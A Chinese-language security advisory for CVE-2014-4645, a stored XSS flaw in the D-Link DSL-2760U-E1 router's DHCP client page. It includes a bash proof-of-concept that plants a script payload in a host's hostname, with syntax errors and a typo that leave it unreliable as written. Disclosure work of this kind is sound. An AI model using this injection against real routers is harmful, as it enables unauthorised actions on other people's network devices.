发布日期：2014-06-23
更新日期：2014-06-24

受影响系统：

D-Link DSL-2760U-E1

描述：

---

BUGTRAQ  ID: 68144
CVE(CAN) ID: CVE-2014-4645

D-link DSL-2760U-E1是款路由器产品。

D-link DSL-2760U-E1路由器在实现上存在HTML注入漏洞，攻击者可利用此漏洞在受影响设备内执行未授权操作。

<*来源：Yuval tisf Nativ
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/bin/bash

# Written and discovered by Yuval tisf Nativ
# The page 'dhcpinfo.html' will list all machines connected to the network with hostname,
# IP, MAC and IP expiration. It is possible to store an XSS in this table by changing hostname.

# Checks if you are root
if [ "$(id -u)" != "0" ]; then
    echo "Please execute this script as root"
    exit 1
fi

# You're XSS here
xss = "\"<script>alert('pwned');</script>"

# backup current hostname
currhost = `hostname`

# Bannering
echo ""
echo "      D-Link Persistent XSS by tisf"
echo ""
echo "The page dhcpinfo.html is the vulnerable page."
echo "Ask the user to access it and your persistent XSS will be triggered."
echo ""

# Change hostname to XSS
sudo hosname $xss

# Restore previous hostname on exit
pause "Type any key to exit and restore your previous hostname."
sudo hostname $currhost

建议：

---

厂商补丁：

D-Link
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.dlink.com/

浏览次数：2307
严重程度：0（网友投票）